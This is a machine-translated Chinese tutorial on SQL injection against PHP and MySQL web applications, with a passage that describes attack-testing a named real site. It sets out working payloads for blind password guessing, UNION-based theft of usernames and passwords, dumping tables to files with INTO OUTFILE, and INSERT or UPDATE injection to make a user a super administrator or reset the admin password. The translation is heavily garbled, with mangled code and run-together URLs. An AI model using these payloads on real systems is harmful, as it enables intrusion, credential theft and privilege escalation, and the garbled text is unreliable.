SQL INJECTION with MySQL

Select * from article where title limited / *% 'Order by title descselect * from artricle where title Like'% __ 'Order by ArticleID #%' Order by Title DESC will list all records, including Hidden, you can also change the order of arrangement. Although this is not harmful, is it a way to inject? Second, the query field inquiry field can be divided into two types, this table query and cross-table query, these two queries and access, MSSQL is almost, even more powerful, more flexible, and more convenient. I don't know why, is it too difficult than ASP? Our individual functions in the ASP have small changes in PHP, as follows: 1 This table looks at the following SQL statement, mostly in the forum or member registration system to view user information,

SQL Query: $ SQL

"; exit;} echo" You want to query the user ID is: $ row [userid] / n "; echo"

SQL Query: $ SQL

";>> When we submit the user name as true, it will return the user's ID. If the illegal parameters will prompt the corresponding error, because it is querying user information, we can boldly guess the password In this data sheet (now I haven't met the password, I have another list of another table), remember the authentication program just now? With now, there is a sum of the AND conditions as follows:

Select * from user where username = '$ usrname' and password = '$ password'select * from user where username =' $ username 'The same is that when the condition is true, it will give the correct prompt information if we construct The back of the AND condition, and make this part as true, then our purpose also reaches, or uses the User database just established, the user name is anger, the password is mypass, read the above example, should know constructed Let's submit:

http://127.0.0.1/injection/user.php?username=Angel 'and password =' ​​mypass This is absolutely true, because we submit the SQL statement above to the following: SELECT * from User Where Username = 'angel' and password = 'mypass' But in actual attacks, we must not know the password, suppose we know the fields of the database, let's start probe password, first get the password length:

http://127.0.0.1/injection/User.php?username=angel 'and length (password) =' 6 In Access, use the LEN () function to get the string length, in MySQL, use Length () As long as there is no construct error, that is, the SQL statement can be executed normally, then the result is not more than two, not returning the user ID, is returning "This record does not exist." When the user name is Angel and the password is 6 times, it will return to the true record, is it the same as the ASP? Use Left (), Right (), MID () function to guess the password:

http://127.0.0.1/injection/user.php?username=abel 'and Left (Password, 1) =' MHTTP: //127.0.0.1/injection/user.php? username = angel 'and left (Password, 2) = 'myhttp: //127.0.0.1/injection/user.php? Username = angel' and left (password, 3) = 'myphttp: //127.0.0.1/injection/user.php? Username = angel' and Left (Password, 4) = 'mypahttp: //127.0.0.1/injection/user.php? Username = angel' and left (password, 5) = 'mypashttp: //127.0.0.1/injection/user.php? Username = Angel 'and Left (Password, 6) =' mypass see, is the password is not coming? Simple? Of course, there will be a lot of conditional restrictions, and the in-depth application of this example will be said. 2 Cross-gum query This part will be a bit out of ASP. In addition to being connected to two SQL statements with UNION, the most difficult to master is the number of fields. If you have seen the MySQL reference manual, you will know Select_Expression in SELECT (SELECT_EXPIPRESSION " The columns that you want to retrieve the column [field]) section must have the same type. The column name used in the first SELECT query will return to the column names of the result set. Simply put, it is the number of fields selected by UNION, the field type should be the same as the front Select, and if the front Select is true, return two SELECT results, when the front select is false, Will return the result of the second Select, some cases will replace the fields that should be displayed in the first SELECT, as shown below: See this picture is intuitive? So you should first know the structure of the data sheet of the previous query table. If we query the fields of the two data tables, the type is the same, we can submit: select * from article where articleid = '$ ID' Union Select * from ... If the field number, the field type is not the same, You can only clear the number of data types and fields, so submit:

Select * from article where articleid = '$ ID' UNION SELECT 1, 1, 1, 1, 1, 1, 1 from ... Otherwise, it will be reported:

If you do not know the number of data types and fields, you can use 1 to slowly try, because 1 belongs to the int / str / var type, so we will change the quantity slowly, you can guess . If you can't understand the above theory, there is a very detailed example. Let's take a look at the data structure below, it is a simple article data sheet.

Create Table `Article` (` Articleid` int (11) Not null auto_increment, `Title` Varchar (100) Not null default '',` Content` TEXT NOT NULL, PRIMARY Key (`Articles)) TYPE = MyISAM Auto_Increme = 3; ## Export table in the table in the table` # Insert Into `Article` VALUES (1, 'I am a child who doesn't love reading",' China's education system is really backward! If I want to be educated, I want to put All teachers are dismiss! '); Insert Into `Article` Values ​​(2,' I hate you", 'I hate you, what you are,'); this table is int, varchar, TEXT, if we use UNION to query, the structure of the table behind the query is the same. You can use "Select *", if you have anything different, then we can only use "SELECT 1, 1, 1, 1 ...". The following file is a very standard, simple display of the article, many sites are not filtered, so becoming the most obvious injection point, then take this file as an example, start our injection experiment. SQL Query: $ SQL

"; exit;} echo" title
"$ row [title]."

/ n "; echo" Content
"$ row [content]." "

/ n"; echo "

SQL Query: $ SQL

";> Under normal circumstances, we submit such a request:

http://127.0.0.1/injection/show.php?id=1 Displays articles with ArticleId 1, but we don't need an article, we need to be user sensitive information, just query the USER table, now you are inquiry Just now we build the USER table. Since the ID is not filtered, we have made this opportunity, we have to rewrite the SQL statement in the show.php file as this:

Select * from article where article = '$ ID' Union Select * from user ... Because this code is a single quotes contains variables, we are now submitted: http://127.0.0.1/injection/show.php? Id = 1 'Union SELECT 1, Username, Password from user / * Say, you should display the user table's username, Password's content of two fields, how can I display the article normally? As shown in the figure: In fact, ArticleId = 1 we submit is what exists in the article table. The execution result is true. Naturally returns the result of the front Select, when we submit an empty value or submit a value that does not exist, it will bounce out us. Want to:

http://127.0.0.1/injection/show.php?id= 'Union Select 1, UserName, Password from user / * http: //127.0.0.1/injection/show.php? id = 99999' Union Select 1, Username, Password from user / * is shown in Figure: Now there is a corresponding place in the field. If you still don't know your ideas and specific applications, some advanced skills will be said. Third, the export file is more easy to construct but there is a certain limit, we can often see the following SQL statements:

Select * from table intfile 'c: /file.txt'Select * from Table Into Outfile' /var/www/file.txt 'But such a statement is usually rarely used in the program, who will put their own data Export? I have never seen such a backup method unless a backup. So we have to construct your own, but you must have the following premise:

You must export the directory that can be accessed, so you can download it. The directory that can be accessed must have writable permissions, otherwise the export will fail. Make sure the hard disk has enough capacity to accommodate the data exported, this is rare. Make sure there is already the same file name, which will cause the export failure and prompt: "File 'c: /file.txt' already exists, this can prevent database tables and files from being destroyed, such as / etc / passwd. We continue to use the above User.php and show.php two files, if a user guess is too slow, if the other party's password or other sensitive information is complicated, do not write Exploit, what to guess Time? Come to a wide range, directly export all the data is fine. User.php query statement, we can export the information we need according to the following statement, in accordance with the INTO OUTFILE standard format:

Select * from user where username = '$ usrname' Into outfile 'c: /file.txt' knows how the statement can achieve our goal, we can easily construct the corresponding statement:

Http://127.0.0.1/injection/user.php?username=Angel 'INTO OUTFILE' C: /FILE.TXT has an error prompt, but from the return statement, our SQL statement is indeed correctly, Even if there is an error, it is also a query problem. The file is still exported, as shown: Since the code itself has a WHER to specify a condition, the data we export is only the data that meets this condition, if we want to export all ? In fact, it is very simple, as long as this WHERE condition is false, and specifies a true condition, you can use the classic 1 = 1 works: http://127.0.0.1/injection /user.php?username= 'or 1 = 1 INTO OUTFILE' C: /FILE.TXT The actual SQL statement becomes:

Select * from user where username = 'or 1 = 1 INTO OUTFILE' C: /FILE.TXT 'This userv is empty, that is, fake, 1 = 1 is always true, then the WHER in front is not It works, but don't use And, otherwise you can't export all data. Since the conditions are met, all data is directly imported in this case! As shown in the figure: But what is the statement of the speakers of export files? Still use of Union combined with query, so all prerequisites should be the same as Union, export data, and cross-tables should be the same as in normal conditions:

Select * from article where articleid = '1' union select 1, username, password from user into outfile 'c :/user.txt' This can be exported, if we want to construct:

http://127.0.0.1/injection/show.php?id=1 'Union Select 1, username, password from user into outfile' c: /user.txt file is coming out, but there is a problem, due to the previous query ArticleID = '1' is true, so the exported data also has part of the entire article, as shown: So we should make the previous query statement as a fake, in order to only export the contents of the query, just submit:

Http://127.0.0.1/injection/show.php?id= 'Union Select 1, username, password from user into outfile' C: /user.txt This can get what we want: worth noting Export files, must be Magic_QUOTES_GPC is not open, and the program also does not use the addslashes () function, and if you do not filter the single quotes, because we must use quotation marks when you submit the export path, otherwise, the system will not Know that is a path, nor does it try to use char () or any function, it is futile. INSERT If you think that in MySQL is only suitable for Select, it is wrong. In fact, there are two more harmful operations. That is insert and update statement, this type of case is not much, first talk about INSERT, this Mainly used to rewrite the inserted data, let's take a simple and widely existing example, see the following data structure: Create Table `User` (` Userid` int not null auto_increment, `username` VARCHAR (20) Not null , `Password` Varchar (50) Not null,` Homepage` VARCHAR (255) Not Null, `Userlevel` int default '1' NOT NULL, Primary Key (` Userid`); where UserLevel represents the user's level, 1 It is ordinary users, 2 is a general administrator, 3 is a super administrator, and a registration program is registered as a normal user by default, as follows:

INSERT INTO `USER` (Userid, UserLevel) VALUES ('', '$ usrname",' $ password ',' $ homepage ',' 1 '); the default UserLevel field is inserted 1, of which The variables are not filtered directly, I don't know what I have? Yes, it is direct injection, so that we register is a super administrator. When we registered, construct $ homepage variables, you can rewrite the purpose, specifying $ homepage variables:

http://4ngel.net ',' 3 ') # turns into the database:

INSERT INTO `USER` (Userid, Username, Password, HomePage, Userlevel) Values ​​('', 'angel', 'mypass',' http://4ngel.net ',' 3 ') #', '1') This will be registered as a super administrator. However, this method also has certain limitations. For example, there is no need to rewrite the variables such as the USERLEVEL field is the first field of the database. There is no way to inject us in front of us, and we have no way. Perhaps Insert also has a wider application, you can study themselves, but the principles are the same. Update and INSERT compared to Update applications, if filtering is not enough, enough to rewrite any data, or take the registration program, the data structure does not change, let's take a look at the user's own information, SQL statement is generally Is written in this: Update user set password = '$ password', homepage = '$ homepage' where id = '$ ID' users can modify their passwords and homepages, what do you think? Never still upgrade the permissions? The SQL statement in the program does not update the USERLEVEL field, how to improve? Still old, construct $ homepage variable, specifying $ homepage variables:

http://4ngel.net ', userlevel =' 3 The entire SQL statement becomes like this:

Update user set password = 'mypass', homepage = 'http: //4ngel.net', userlevel = '3' where id = '$ ID' Do we turn into super administrators? The program does not update the UserLevel field, we will come by himself. There is also more, directly modifying the information of any user, or just now, but this safety, use MD5 encryption:

Update user set password = 'MD5 ($ Password)', homepage = '$ homepage' where id = '$ ID' Although the password is encrypted, we can still construct the statement we need, we specify $ Password as:

Mypass' where username = 'admin' # The whole statement becomes:

Update user set password = 'md5' where username = 'admin' #) ', homepage =' $ homepage 'Where id =' $ ID 'This changed the update condition, I manage your code behind you. Cry this: We haven't performed yet. Of course, you can also start from the ID, specifying $ ID:

'Or username =' admin 'This time the entire statement becomes:

Update User Set Password = 'MD5 ($ Password)', homepage = '$ homepage' where id = 'or usrname =' admin 'can also achieve the purpose of modification, so that injection is a very flexible technology. If some variables are fixed values ​​read from the database, even when using the session information on the server with $ _SESSION ['Username'], we can construct where WHERE, and commented out the code behind the original WHERE. This opinion, flexible use of comments is also one of the techniques of injection. These techniques have played the injection. Have to say an art. The variable's submissions can be GET or POST, the submitted location can be an address bar, a form, hidden form variable, or modify local cookie information, etc., the submitted approach can be local submission, the server is submitted or the tool submit, a variety of ways See how you use it. Advanced Applications 1, using the MySQL built-in functions we are in the an Access, MSSQL, there are a lot of advanced injection methods, such as in-depth system, guess Chinese, etc., these things, in MySQL can be very good, in fact, in MySQL Many built-in functions can be used in the SQL statement so that we can make more flexible in injection and get more information about the system. There are several functions that are more common: Database () user () system_user () session_user () current_user () ... The specific role of each function can check the mysql manual, such as the following Update:

Update Article Set Title = $ TITLE WHERE ARTICLEID = 1 We can specify $ TITLE for the above functions, because no quotation marks include, the function can be performed correctly:

Update Article Set Title = Database () where id = 1 # Update the current database name to title field Update Article Set title = user () where id = 1 # Update the current MySQL username to title field Update Article Set title = system_user ) Where id = 1 # Update the current MySQL username to title field Update Article Set title = session_user () where id = 1 # Update the current MySQL username to title field Update Article Set title = current_user () where id = 1 # Updating the current session authentication username to the Title field Flexible use of the MySQL built-in function, you can get a lot of useful information, such as database version, name, user, current database, etc., such as the example of cross-table query, submit:

Http://127.0.0.1/injection/show.php?id=1 can see an article, how can we know the information about the mysql database? Also use the mysql built-in function to cooperate with UNION union query, but it is much simpler than it, even if you can read the file! Since it is necessary to use Union, you must also meet the conditions of UNION - field, the same data type. If we know the data structure, the direct construct:

http://127.0.0.1/injection/show.php?id=-1 Union Select 1, Database (), Version () You can return to the current database name and database version, the structure is easier. The following is attached to the code written by my friend Super · Hei, can convert the string to the ASCII code. Thanks for providing. #! / usr / bin / perl # Cody by Super · Hei #to Angel # c: /> Test.pl C: /Boot.ini # 99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105 $ argc = @argv; if ($ Argc! = 1) {Print "USAGE: $ 0 / n"; exit (1);} $ path = shift; @char = unpack ('c *', $ path); $ asc = Join (",", @ Char); Print $ ASC; 2, do not add single quotation mark Note: Now we assume Magic_QUOTES_GPC to be ON. As we all know, the shaped data is not required to use quotation marks, and the string will use quotation marks, which avoids many problems. However, if we use shaping data, we have no way to inject, so I need to convert the statements we constructed into a shaped type, this requires char (), ASCII (), ORD (), conv () these functions. , A simple example:

Select * from user where username = 'angel' How to make $ usrname without quotation marks? Very simple, we can submit this.

Select * from user where username = char (97, 110, 103, 101, 108) # char (97, 110, 103, 101, 108) is equivalent to an Agel, decimal. Select * from user where username = 0x616e67656c # 0x616e67656c is equivalent to Angel, hexadecimal. Other functions have been tested by themselves, but the premise is as mentioned above, the variables we can construct will not be meaningful, otherwise we don't have to construct what, just strings, can't play, such as front guesses password Example (User, PHP), we change the query conditions to userid:

Select * from user where userid = userid follows normal, submitted:

http://127.0.0.1/injection/User.php?Userid=1 You can query user information 1 of 1, because 1 is a number, so there is no quotation, but if we construct:

http://127.0.0.1/injection/user.php?userid=1 and password = mypass absolute error, because mypass is a string unless submitted:

Http://127.0.0.1/injection/user.php?userid=1 and password = 'mypass' is absolutely impossible for the relationship that MAGIC_QUOTES_GPC is opened. Quotation marks will become / ', do we have any way to turn these strings into plastic data? That is to use a char () function if we submit:

http://127.0.0.1/injection/user.php?userid=1 and password = char (109, 121, 112, 97, 115, 115) Normal return, practice prove, we use char () is feasible, we will use char () into Left Inside the function, you are guess! http://127.0.0.1/injection/user.php?userid=1 and left (password, 1) = Char (109) Normal return, explaining UserId 1 users, the first bit of the Password field is char (109), We continue to guess:

http://127.0.0.1/injection/user.php?userid=1 and left (password, 2) = char (109, 121) is normal to return, explain the correct, but this affects efficiency, since we are plastic, we can use Comparison operator compares:

http://127.0.0.1/injection/user.php?userid=1 and left (password, 1)> char (100) then adjust the number of char () to determine a range, soon guessed, When it is behind, it is still possible to compare the comparison operator:

http://127.0.0.1/injection/user.php?userid=1 and left (Password, 3)> Char (109, 121, 111) and it has been guessing, soon, you can guess:

http://127.0.0.1/injection/User.php?userid=1 and left (password, 6) = char (109, 121, 112, 97, 115, 115) then execute under the mysql> command prompt or in phpMyAdmin:

Select Char (109, 121, 112, 97, 115, 115) will return: MyPass can of course use SubString (STR, POS, LEN) and MID (STR, POS, LEN) functions, and returns a substring of LEN characters from the POS position of the string STR. . This is the same as Access. Or just now, we guess the third place in the Password field, the fourth place, the third is P, fourth is A, we construct:

http://127.0.0.1/injection/user.php?userid=1 and MID (Password, 3, 1) = char (112) http://127.0.0.1/injection/user.php?userid=1 and MID (Password, 4, 1) = CHAR (97) The result we want is built. Of course, if you feel trouble, you can use a simpler way to use the ORD () function, the specific role can go to the MySQL Reference Manual, the function returns the shaped data, which can be compared with the comparison operator. The result is much more, that is, this is submitted:

http://127.0.0.1/injection/user.php?userid=1 and ORD (MID (Password, 3, 1))> 111Http: //127.0.0.1/injection/user.php? userid = 1 and ORD ( MID (Password, 3, 1)) <113http: //127.0.0.1/injection/user.php? userid = 1 and ORD (MID (Password, 3, 1)) = 112 In this way, we will get the result, then We will restore it again with the char () function. As for other more functions, everyone can go to the test, limited to the space, and not more. 3. Quickly determine the field and type of unknown data structure If you don't know the data structure, it is difficult to use UNION union inquiry. Here I tell you a small skill, which is also very useful and very necessary, give full play to the characteristics of Union. Still take the front show.php file, when we see the URL of XXX.php? Id = XXX, if you want Union, you must know the structure of the data sheet for this xxx.php query, we can Submit to quickly determine how many fields: http://127.0.0.1/injection/show.php? ID = -1 Union SELECT 1, 1, how many "1" means how many fields can be slow Try, if the number of fields is different, it will definitely be wrong. If the field number is paid, it will definitely return the correct page. The number of fields will start to judge the data type, which is also very easy, just replaced with several letters The above 1, but due to Magic_QUOTES_GPC, we can't use quotation marks, old way, or use the char () function, char (97) means the letters "A", as follows:

http://127.0.0.1/injection/show.php?id=-1 Union Select Char (97), Char (97), CHAR (97) If it is a string, it will display "a" normally, if not Strings or text, that is, it is shaped or Boolean, it will return "0", as shown in the figure: What is the most important thing to judge? Experience, I have always said that experience is very important, rich experience can make the correct judgment, because the code's code is a thousand variables, we are just the simplest example, here due to limitations, procedures are I wrote it myself, test it myself. The method varies depending on the program. I hope that everyone will pay attention to differences in actual combat, don't move, flexible use is the foundation. 4. Guess data table name is based on the field and type of unknown data structure, we can further analyze the entire data structure, that is, guessing the name, in fact, when using Union to query, regardless of the back inquiry " Deformity, as long as there is no statement, it will return correctly, that is, we can further guess the name on the top, such as we have submitted:

http://127.0.0.1/injection/show.php?id=1 UNION SELECT 1, 1, 10 returns to normal content, indicating that there is 3 fields in the table of this file query, and then we join from from TABLE_NAME, that is, this:

Http://127.0.0.1/injection/show.php?id=1 Union SELECT 1, 1, 1 from membershttp: //127.0.0.1/injection/show.php? id = 1 Union SELECT 1,1,1 from Adminhttp: //127.0.0.1/injection/show.php? id = 1 Union SELECT 1, 1, 1 from user If this table exists, then it will return the content that should be displayed, if the table does not exist, of course it will I have an error, so my idea is to first obtain the data structure of the list of vulnerabilities, determine the result, then further check the table, this manual operation is no efficiency, less than a minute, you can query, such as us In the test WWW. *** bai.net is the case, and the rear case will be involved. But there is a problem. Because many cases, many programs have a prefix, with this prefix allows multiple programs to share a database. For example: site_articlesite_usersite_downloadforum_userforum_post ... If the security is high, the administrator will add a table name prefix. The guess is very troublesome, but you can do a list of table names to run. Not much here, there will be a specific example to solve all confused ^ _ ^ ... Example The following to a domestic and very famous site to make a good attack test, to make a probably verification of the above knowledge For the impact, many factors, we call this site to HB (www. *** bai.net), HB uses the night cat's article system and download system, but the article system has been upgraded, we will not watch The download system is absolutely problematic, but because I am not online, I use the same download system to perform an simulated test. In fact, I used more vicious techniques to penetrate through HB beforehand. First we find questions, show.php? Id = 1, we immediately look at the data structure and table name, see if HB has changed fields and table names, I know the Software of the Night Cat Download System 1.0.1 The table of information has 19 fields, submitted:

Http://127.0.0.1/ymdown/show.php?id=1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 1, 1, 1, here, there are 19 "1", return to normal pages, I can affirm the field does not change, we don't drag, directly look at whether the default user data table of the night cat exists:

Http://127.0.0.1/ymdown/show.php?id=1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 1, 1, 1 from ymdown_user returns, as shown in the figure, if the URL is unclear, you can see the title: Well, this HB is really lazy, so bad procedures don't know, but also, no How many people have idle, I will go to reinforce the program, and then I will see the default user ID is not there?

Http://127.0.0.1/ymdown/show.php?id=1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 1, 1, 1 from ymdown_user where id = 1 Forgot, even if there is no ID of the ID 1, the front query is true, and the software information of the database will be returned to the database. We can only let the front query is fake. In order to make the results of the back query display, we have to pay attention to a point, show.php files have such code: if ($ ID> "0" && $ ID <"99999999"): // This is the correct execution code Else: echo "